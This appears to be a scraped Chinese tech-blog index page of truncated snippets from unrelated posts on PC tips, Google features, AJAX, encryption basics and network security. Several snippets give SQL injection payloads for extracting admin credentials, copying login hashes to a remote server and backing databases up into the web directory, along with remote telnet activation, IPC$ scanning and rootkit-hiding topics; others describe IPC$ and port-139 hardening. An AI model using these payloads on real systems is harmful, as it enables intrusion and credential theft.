净心编程

        想让你的电脑变的更聪明、更人性化吗？想让电脑自动为你做些事吗？下面我就向大家介绍电脑的“自动化”。让电脑变聪明，也让你工作学习起来更方便了。 　　自动开机         自动开机是一个非常实用的功能，利用它我们能做很多事情。现在自动开机的方法基本上都是通过设置BIOS参数来实现的。在开机时按下“Del”键，进入BIOS设置程序，选择“Power Management Setup”

自动拨号上网 　　如果我们想让电脑自动收信，下载文件的话，那么自动上网是很重要的，目前能使电脑自动拨号的程序很少，这里我们就用大家最熟悉的“网络蚂蚁”来实现自动拨号吧。 　　启动“网络蚂蚁”，点击菜单“选项—参数设置”，弹出设置对话框，点击“拨号”选项卡中激活“使用拨号网络连接”，并选择一个建立好的拨号连接，再正确输入上网的“用户”和“口令”，把“必要时自动拨号”前的勾打上。 　　有时后会出现网

        一些别有用心者曾经利用黑客工具软件对我所管理的服务器进行IPC＄漏洞探测，其中以“流光”软件最为出名，其运行主界面如图1所示，按[Ctrl+R]键弹出扫描框(如图2)。在扫描范围栏里输入你要扫描的IP地址范围，在扫描主机类型里选择Windows NT/98，确定后进行扫描，这样，一些在线的Windows NT/98机器就会被扫描出来。图2 扫描对话框　　　　鼠标右击界面上“IPC＄

        7.中英文字典经常使用计算机的用户手头上自然会有一、两个字典软件，用于查找和翻译中英文的词义。作为一种使用频率较高的工具，Google也提供了一个中英文字典，很方便使用。用户可以按照下列方法查找词义查找英文的中文词义则输入fycomputer查找中文的英文词义则输入翻译计算机8.天气查询 天气情况也是人们经常要查询的信息之一，Google提供的天气查询来自于一个更新及时的中文气象网

     11.手机归属地查询 　　用户在输入手机号码后可以获得号码段、归属地、卡类型、邮政编码和电话区号的信息，但是从实用的角度看，其中只有手机归属地的信息较为有用。 　　12.计算器使用         Google有计算器的功能，例如在google检索框中输入45*86+35/7，就会得到结果： 　　(45*86)　+　(35/7)　=　3875 　　有兴趣的用户，或者经常在计算机上进行运算

        1.如果同时有多个窗口打开，想要关闭的话，可以按住shift不放然后点击窗口右 上角的关闭图标. 　　2.在保存网页前，可以按一下"ESC"键(或脱机工作)再保存,这样保存很快         3.用电脑听CD可以不用任何的播放软件，把音箱线直接接到光驱的耳机孔，放入 CD，按光驱上的play键就可以直接听了，这样听歌可以不占用系统资源。（如果你的电脑坏了，不能启动或什么的，一时放

        23.NTFS分区上文件属性中有个“摘要”功能，很有用的，这样一些软件安装程序 是什么东东就不会忘了啊! 　　24.在IE的地址栏输入： javescript:alert(document.lastModified)可以得到网 页的更新日期.         25.通过网络共享时，尽量使用"运行"，/ip地址共享文件名，而不要使用通过 “网上邻居”浏览访问，速度很慢，而且经常不全（

可以得到用户名 依次可以得到密码。。。。。假设存在user_id username ,password 等字段Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from adminShow.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin     

传统查询构造：select * FROM news where id=... AND topic=... AND .....adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass select 123;--;use master

通常注射的一些介绍：　　A) ID=49 这类注入的参数是数字型，SQL语句原貌大致如下：　　select * from 表名 where 字段=49　　注入的参数为ID=49 And [查询条件]，即是生成语句：　　select * from 表名 where 字段=49 And [查询条件](B) Class=连续剧 这类注入的参数是字符型，SQL语句原貌大致概如下：　　select * fr

3、 复制哈西表（HASH）　　这实际上是上述复制数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下：insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;, select * from _sysxlogins) s

把数据库备份到网页目录：下载_blank>http://http://www.xxxxx.com/down/list.asp?id=1;declare　@a　sysname;　set　@a=db_name();backup　database　@a　to　disk=e:/web/down.bak;-- and%201=(select%20top%201%20name%20from(select%

        通过139端口入侵是网络攻击中常见的一种攻击手段，一般情况下139端口开启是由于NetBIOS网络协议的使用。NetBIOS即网络基本输入输出系统，系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址，从而实现信息通讯。在局域网内部使用NetBIOS协议可以非常方便地实现消息通信，但是如果在Internet上，NetBIOS就相当于一个后门

防范139攻击　　对于139端口攻击的防范针对不同系统的设置也有所不同，下面就来分别描述。　　针对使用Windows 9x系统拨号上网用户，可以不必登录到NT局域网络环境，打开控制面板，然后双击“网络”图标，在“主网络登录”中选择“Microsoft友好登录”，不必选择“Windows网络用户”方式。此外，也不必设置“文件打印共享”（如图2）。　　 　　图2　　对于Windows NT用户，可以取

使用防火墙防范攻击　　对于个人上网用户可以使用“天网防火墙”定制防火墙规则。启动“天网个人防火墙”，选择一条空规则，设置数据包方向为“接收”，对方IP地址选“任何地址”，协议设定为“TCP”，本地端口设置为“139到139”，对方端口设置为“0到0”，设置标志位为“SYN”，动作设置为“拦截”，最后单击［确定］按钮，并在“自定义IP规则”列表中勾选此规则即可启动拦截139端口攻击了（如图7）。　　

        打开控制面板--管理工具--计算机管理 　　操作-连接到另一计算机. 　　然后输入IP192.168.0.225 图5　　呵.等一会就可以看到成功了...你看到了什么? 　　更爽的是我们可以远程开启他的服务...在这里启动他的telnet服务. 图6　　OK了... 　　本地打开一cmd 　　输入 　　G:/>telnet 192.168.0.225 　　回车后出现 　　Serve

打开Winhex(一种类似记事本的编辑工具，不过功能强得多，在网上搜吧，可以免费下的，多得很)，先不管， 然后右键单击右下角的还原精灵图标，点击"设定参数"，点击"更改密"，然后出现一对话框，请输入旧密码--填ike(随便填)，请输入新密码--126.com(随便填)， 请确认新密码-- 009web(确认)。再点击确定， 下面出现两种情况：①提示框：密码更改成功，请记住新密码。②提示框：旧密码不

NTFS不利的一面创建时间：2002-12-04文章属性：翻译文章来源：幻影旅团翻译组 www.3389.net文章提交：bigworm (netfox207_at_eyou.com)NTFS不利的一面翻译+整理: By Bigworm 不当之处请指正这篇文章是根据H. Carvey的The Dark Side of NTFS (Microsoft’s Scarlet Letter)翻译的,可以自

此文为转贴lake2的，感谢他的分享精神。    关于交换数据流（alternate data streams）的概念请参看bigworm翻译的文章《NTFS不利的一面》，本文只是讲一下在IIS上访问ADS的情况。    先请大家看一个很古老的漏洞：Microsoft IIS 3.0/4.0 ::$DATA请求泄露ASP源代码漏洞。大概这是能找到的ADS与IIS的最早的报告了。    $DATA是

创建时间：2005-12-20文章属性：原创文章提交：backspray (nimaozhi_at_163.com)作者：倪茂志邮件：backspray008@gmail.com完成于：2005.12.20文章分为八个部分：                一、为什么需要伪造内核                二、伪造内核文件                三、隐藏进程               

创建时间：2005-03-09文章属性：转载文章提交：cisocker (cisocker_at_163.com)by sunwear [E.S.T]  2004/10/02   shellcoder@163.com此文只能说是一篇笔记，是关于本机API的.本机API是除了Win32 API，NT平台开放了另一个基本接口。本机API也被很多人所熟悉，因为内核模式模块位于更低的系统级别，在那个级别上

创建时间：2005-04-13 更新时间：2005-04-14文章属性：翻译文章提交：sFqRy (mqphk163_at_163.com)非API函数检测操作系统类型作者：Thomas Kruse,nbw来源：The Assembly-Programming-Journal, Vol. 1, No. 1 (2004)http://www.Assembly-Journal.comAbstract概

创建时间：2004-03-08文章属性：原创文章提交：SoBeIt (kinsephi_at_hotmail.com)绕过Windows Rootkit检测系统                                        SoBeIt                Edgar Barbosa                embarbosa@yahoo.com     [介绍] 

我下了很多电子书，其中有些是*.chm格式的，由于，我喜欢C#，将其存在名为C#目录中，可是我打开这个电子书时，会看不到其内容，就像IE断网了一样的提示。后来，发现就是因为这个C#的“#”符号，让其不能正常找到内容的。如果您有也同样的烦恼，那请将#改掉。

创建时间：2005-03-24文章属性：原创文章提交：suei8423 (suei8423_at_163.com)安全稳定的实现进线程监控作者:ZwelL    用PsSetCreateProcessNotifyRoutine,PsSetCreateThreadNotifyRoutine来进行进程线程监控我想大家已经都非常熟练了.sinister在>一文中已经实现得很好了.前一段时间看到网上有人在

创建时间：2004-04-22 更新时间：2004-04-22文章属性：原创文章提交：SoBeIt (kinsephi_at_hotmail.com)绕过内核调度链表进程检测                                                                                               SoBeIt    一般隐藏进程的方

        谈到网页搜索引擎时，大多数人都会想到雅虎。的确，雅虎开创了一个互联网络的搜索时代。然而，雅虎目前用于搜索网页的技术却并非该公司原先自己开发的。2000年8月，雅虎采用了Google（www.google.com）这家由斯坦福大学学生创建的风险公司的技术。理由非常简单，Google的搜索引擎比雅虎先前使用的技术能更快、更准确搜索到所需要的信息。 　　让我们自己来设计、开发一个强劲、高

　　AJAX在过去的半年时间里赢得广泛认可的原因是基于它要缩短Web应用程序和桌面应用程序之间的差距，并在其中充分结合可实现的技术和丰富的用户体验。同时，在AJAX的技术公司和开发者在商场上所期望的与现实之间的差距也的确相当惊人。不管怎么说，AJAX既不是一种工具也不是一种平台；而且如今，也不存在AJAX标准委员会或社团。软件供应商竭力打造基于AJAX的专利开发平台（这很大程度上意味着"从零"开始

剑，一把好剑，重三两三分，轻如蝉翼，千年寒冰所铸，剑身咖啡色，剑柄发黑，玄机暗藏，此乃好剑——Java。　　剑入江湖十年有余，未尝一败，纵观江湖十数载，除无极棍C/C++之外，此剑未输其他，甚至隐隐有超越之势，夺其宝座之嫌，然无极棍毕竟功力深厚，用之越久则威力更盛，不比其他武器，上手便是花招，给初次使用者以极大的荣誉感和满足感，忽略内家功夫的根基..此乃大忌..Java剑行走江湖十余年来，创造武功

自Google推出地图服务以后，微软和百渡也相继推出地图服务。地图成为目下网络流行的时尚，如果你想追赶它，那么来吧，我将会帮助你学会使用微软的Virtual Earth Map Control，为你的网站添加一道亮丽的风景。　　本文最终效果图：全文见：http://soft.yesky.com/12/2148512.shtml?412

现在提起AJAX，大家都立刻会想起Gmail、google map这几个经典的AJAX应用。Gmail的优良表现我们都看过了，那么它的实现你研究过了吗？它怎么在几个不同的浏览器上可以一致的实现xml异步调用的呢？一起来看看吧。 　　首先，登录gmail以后我们会先进入这个页面：全文见：http://soft.yesky.com/489/2184489.shtml

一、 引言　　在第一部分中，我们讨论了AJAX基础——建立从脚本到服务器的通讯的能力，这正是使HTML页面具有动态能力的原因所在。然而，这就意味着我们已准备好抛弃我们自己版本的Yahoo邮件吗？不，还没有。原因在于：AJAX是一个混合的祝福。一方面，它使我们能够在Web上创建丰富的桌面级的应用程序；另一方面，如果我们把"翻页面式"的Web应用程序与客户端/服务器或Swing版本的程序进行比较，那么

自动回复邮件 　　这个功能是web信箱的特点，当有人给的发电子邮件给你，邮件到你的信箱后，信箱系统就会自动给寄信人发一封邮件，信的内容你可以自己设置的。 　　这里我们以新浪的免费信箱为例。首先进入你的web信箱，点击左边的菜单里的“设置区”，进入“设置区”页面后，我们再点击“自动回复设置”，就能进行自动回复的设置了。 　　在“自动回复设置”里面需要填写的有自动回复邮件正文、签名（包含签名文件），

IPC＄漏洞描述　　用过Windows 2000的人都知道，Windows 2000的默认安装允许任何用户通过空用户连接（IPC＄）得到系统所有账号和共享列表，这本来是为了方便局域网用户共享资源和文件的，但是任何一个远程用户都可以利用这个空的连接得到你的用户列表。一些别有用心者会利用这项功能，查找我们的用户列表，并使用一些字典工具，对我们的主机进行攻击。另外，在安装系统时创建一些隐藏的共享，通过“

防范IPC＄漏洞攻击        知道黑客利用此漏洞入侵后，我惊出了一身冷汗，赶紧把密码设置得复杂一些，但是无论我采用多复杂的密码，过一段时间还是发现有被入侵的迹象。看来万事都不能两全，计算机管理也一样，要方便就不安全，要安全就不方便，所以我只好采用下面的方法把IPC$漏洞堵住，这样自己也就没办法享受默认共享带来的方便了。 　　1. 通过修改注册表来禁止建立空连接（IPC＄）　　点击［开始］→［

        大家知道，通过那些可显示IP地址的QQ就能轻松查询到好友的IP地址，但对于众多的MSN用户来说，MSN软件本身并不提供显示IP功能，但假如利用监控MSN点对点传输时的端口情况，就依然可以轻而易举地知道对方的IP地址，而且操作方法也不复杂，下面大家就一起来实战刺探一番MSN上好友IP地址的真面目吧。        第一步 连接网络，登录到MSN后，切换到MS-DOS状态，接着在DOS

        随着网络技术的发展，网络安全也就成为当今网络社会的焦点中的焦点，几乎没有人不在谈论网络上的安全问题，病毒、黑客程序、邮件炸弹、远程侦听等这一切都无不让人胆战心惊。病毒、黑客的猖獗使身处今日网络社会的人们感觉到谈网色变，无所适从。         但我们必需清楚地认识到，这一切一切的安全问题我们不可一下全部找到解决方案，况且有的是根本无法找到彻底的解决方案，如病毒程序，因为任何反病毒

三、加密的理由         当今网络社会选择加密已是我们别无选择，其一是我们知道在互联网上进行文件传输、电子邮件商务往来存在许多不安全因素，特别是对于一些大公司和一些机密文件在网络上传输。而且这种不安全性是互联网存在基础——TCP/IP协议所固有的，包括一些基于TCP/IP的服务；另一方面，互联网给众多的商家带来了无限的商机，互联网把全世界连在了一起，走向互联网就意味着走向了世界，这对于无数商

五、加密技术中的摘要函数（MAD、MAD和MAD）         摘要是一种防止改动的方法，其中用到的函数叫摘要函数。这些函数的输入可以是任意大小的消息，而输出是一个固定长度的摘要。摘要有这样一个性质，如果改变了输入消息中的任何东西，甚至只有一位，输出的摘要将会发生不可预测的改变，也就是说输入消息的每一位对输出摘要都有影响。总之，摘要算法从给定的文本块中产生一个数字签名（fingerprint或

   七、数据加密的标准         最早、最著名的保密密钥或对称密钥加密算法DES(Data Encryption Standard)是由IBM公司在70年代发展起来的，并经政府的加密标准筛选后，于1976年11月被美国政府采用，DES随后被美国国家标准局和美国国家标准协会（American National Standard Institute，ANSI）承认。    DES使用56位密钥